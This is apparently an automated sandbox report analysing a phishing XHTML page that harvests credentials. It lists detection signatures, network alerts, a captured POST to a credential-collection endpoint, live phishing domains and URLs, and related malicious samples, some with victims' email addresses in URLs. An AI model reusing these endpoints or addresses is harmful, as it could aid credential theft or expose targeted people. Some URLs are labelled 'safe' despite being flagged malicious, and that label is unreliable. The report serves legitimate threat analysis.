Edit tour

Windows Analysis Report
auuu.xhtml

Overview

General Information

Sample name:	auuu.xhtml
Analysis ID:	1646850
MD5:	4df27f004583a2ee6e7d536f459ee723
SHA1:	ed50089aa75d41d314ec53148d781fa720095223
SHA256:	032073910f345c3ff0f0a0e751eec90d1dbce1e51a071fe90a2fdb8c9064b0be
Infos:

Detection

HTMLPhisher

Score:	76
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

HTML IFrame injector detected

HTML Script injector detected

Suspicious Javascript code found in HTML file

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

HTML body contains low number of good links

HTML body contains password input but no form action

IP address seen in connection with other malware

Invalid 'forgot password' link found

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 5432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2320,i,11972837007240688356,14361615590807501320,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2588 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\auuu.xhtml" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

ETPRO PHISHING Successful Generic Phish 2021-03-25

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-24T10:13:42.120079+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49754	104.168.138.190	443	TCP
2025-03-24T10:14:05.451751+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49762	104.168.138.190	443	TCP
2025-03-24T10:14:16.584266+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49776	104.168.138.190	443	TCP
2025-03-24T10:14:25.434731+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49784	104.168.138.190	443	TCP
2025-03-24T10:15:06.085245+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49794	104.168.138.190	443	TCP
2025-03-24T10:15:36.757342+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49799	104.168.138.190	443	TCP
2025-03-24T10:16:07.139913+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49804	104.168.138.190	443	TCP

HTTP traffic detected: POST /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveContent-Length: 54sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chromecache_72.3.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_74.3.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_74.3.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.4:49758 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir1624_421366160

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir1624_421366160

Jump to behavior

Source: classification engine

Classification label: mal76.phis.winXHTML@22/23@24/11

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2320,i,11972837007240688356,14361615590807501320,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2588 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\auuu.xhtml"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2320,i,11972837007240688356,14361615590807501320,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2588 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://avcbtech.site/kuk/xwps.php	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/auuu.xhtml	0%	Avira URL Cloud	safe
https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=daria.czajkowska@rockwool.com	0%	Avira URL Cloud	safe
https://sender.linxcoded.top/start/xls/includes/css6.css	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0012.t-0009.t-msedge.net	13.107.246.40	true	false	high
office.avcbtech.store	139.28.36.38	true	false	high
code.jquery.com	151.101.66.137	true	false	high
avcbtech.site	104.168.138.190	true	false	high
server1.linxcoded.top	185.174.100.76	true	false	high
www.google.com	142.251.35.164	true	false	high
api.ipify.org	104.26.12.205	true	false	high
sender.linxcoded.top	185.174.100.20	true	false	high
ipv4.imgur.map.fastly.net	199.232.192.193	true	false	high
i.imgur.com	unknown	unknown	false	high
_8248._https.server1.linxcoded.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/auuu.xhtml	true	Avira URL Cloud: safe	unknown
https://i.imgur.com/0HdPsKK.png	false		high
https://avcbtech.site/kuk/xwps.php	true	Avira URL Cloud: safe	unknown
https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=daria.czajkowska@rockwool.com	true	Avira URL Cloud: safe	unknown
https://sender.linxcoded.top/start/xls/includes/css6.css	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/KAb5SEy.png	false		high
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://api.ipify.org/?format=json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_74.3.dr	false		high
https://getbootstrap.com)	chromecache_74.3.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
185.174.100.20	sender.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
199.232.192.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
139.28.36.38	office.avcbtech.store	Ukraine	42331	FREEHOSTUA	false
185.174.100.76	server1.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
104.168.138.190	avcbtech.site	United States	54290	HOSTWINDSUS	false
151.101.66.137	code.jquery.com	United States	54113	FASTLYUS	false
104.26.13.205	unknown	United States	13335	CLOUDFLARENETUS	false
142.251.35.164	www.google.com	United States	15169	GOOGLEUS	false
172.67.74.152	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1646850
Start date and time:	2025-03-24 10:11:49 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	auuu.xhtml
Detection:	MAL
Classification:	mal76.phis.winXHTML@22/23@24/11
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xhtml

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.40.99, 172.253.62.84, 142.251.41.14, 142.250.80.110, 142.250.65.206, 142.250.80.78, 142.250.80.46, 142.250.81.234, 23.203.176.221, 208.89.73.23, 142.251.40.110, 142.250.64.110, 142.251.40.142, 199.232.214.172, 142.250.176.195, 142.250.81.238, 142.250.80.99, 23.193.201.36, 142.251.40.238, 142.250.65.238, 142.251.35.174, 23.204.23.20, 13.107.246.40, 52.149.20.212
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, ocsp.digicert.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	ArenaWarsSetup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	ue8Q3DCbNG.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	LauncherV9.exe	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=xml
	NightFixed 1.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	api.ipify.org/
	VRChat_ERP_Setup 1.0.0.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	wEY98gM1Jj.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
185.174.100.20	ATT11027.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse
	https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Get hash	malicious	HtmlDropper	Browse
	ATT-897850.htm	Get hash	malicious	HtmlDropper	Browse
	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse
	Play-Audio_Vmail_Ach Statement Credi....html	Get hash	malicious	HtmlDropper	Browse
	Play_VM.Now.matt.sibilo_Audio.wav...v.html	Get hash	malicious	HtmlDropper	Browse
	original (37).eml	Get hash	malicious	Unknown	Browse
199.232.192.193	jae1h6e218.exe	Get hash	malicious	RHADAMANTHYS	Browse
	Final Contract document.html	Get hash	malicious	HTMLPhisher	Browse
	lMAZvNDY8G.exe	Get hash	malicious	RHADAMANTHYS	Browse
	http://pub-a5c199e46db94f72884285a0394a65f2.r2.dev/green-table-top.html	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	https://quilter.fineequiprnent.net/cyyksfewtebxpij/nspderlqsumnd/Zzlfycybzhhctwe89g0xmsc/uztzgkmaolipwp/qvxwpsequug/connor.allen/wvqtiwhatdb/quilter.com/clzcbcvcepgd8	Get hash	malicious	HTMLPhisher	Browse
	https://2ig5kgwiett8w7e9ev.blogspot.com/	Get hash	malicious	HTMLPhisher	Browse
	https://pub-a75ffa45639b4a91a804d5a002f48c9d.r2.dev/signs.html	Get hash	malicious	HTMLPhisher	Browse
	http://gift50steam.com/50	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
avcbtech.site	ATT11027.xhtml	Get hash	malicious	HTMLPhisher	Browse	104.168.138.190
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	104.168.138.190
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	104.168.138.190
api.ipify.org	3-25.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	MV PILATUS MARINE - Vessel Particulars.xlsx.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	01. GENJI Q88.pdf.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	MV SUPER TRADER.pdf.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	u4K82586fa.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	SecuriteInfo.com.Win64.Evo-gen.11723.19544.exe	Get hash	malicious	Skuld Stealer	Browse	172.67.74.152
	Test(1).exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	HugeHack 1.3.exe.bin.exe	Get hash	malicious	Njrat	Browse	172.67.74.152
	JPiACp4fEG.exe	Get hash	malicious	Cerber, Conti, Sapphire, TrojanRansom, WarGame	Browse	104.26.12.205
	pyaj5Y97G9.exe	Get hash	malicious	Conti, Sapphire, TrojanRansom	Browse	172.67.74.152
code.jquery.com	Invoice1-1706517.pdf	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.66.137
	FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.194.137
	https://offce365.auramisteriosafyr.it.com/CM4kN/	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://steigerwaldt.com/	Get hash	malicious	Unknown	Browse	151.101.66.137
	Swift.Copy(21 Mar 2025).pdf.html	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFguqKBJA-2BlCiR08w7qJIKltwWs1iwx4iDdKHxA5CYPlQURzm_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZPtKM-2FoAva2x6XydS-2BQkAaQFLL0bTHd-2BvpXWEIQw9OO3bs7wPk5-2FNGT2lT8nlX5ZgLnybcv-2FqVaWsH3iKC3k-2FYDOulAWlkfFO-2F-2BgJKklGUh9CJuKEwyNd9zNdCIOytI452XQw-2B8x6xiJPAqHz27f1LkfRWUbtJdWgeQgZHjwMrUD5-2Bofn-2BpMejbkxPyCuPtUnwWOwh3Q69DcfaaJRyxPZ-2FuN-2FnCbycFi8LhnIQX7rSKvUsNy61FOnwomGAQ5UmVDc4-3D#Cjosh@ltvco.com	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.130.137
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFguqKBJA-2BlCiR08w7qJIKltwWs1iwx4iDdKHxA5CYPlQURzm_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZPtKM-2FoAva2x6XydS-2BQkAaQFLL0bTHd-2BvpXWEIQw9OO3bs7wPk5-2FNGT2lT8nlX5ZgLnybcv-2FqVaWsH3iKC3k-2FYDOulAWlkfFO-2F-2BgJKklGUh9CJuKEwyNd9zNdCIOytI452XQw-2B8x6xiJPAqHz27f1LkfRWUbtJdWgeQgZHjwMrUD5-2Bofn-2BpMejbkxPyCuPtUnwWOwh3Q69DcfaaJRyxPZ-2FuN-2FnCbycFi8LhnIQX7rSKvUsNy61FOnwomGAQ5UmVDc4-3D#Ctarget@att.net	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://han.gl/SlVMU	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://han.gl/ROJa9	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
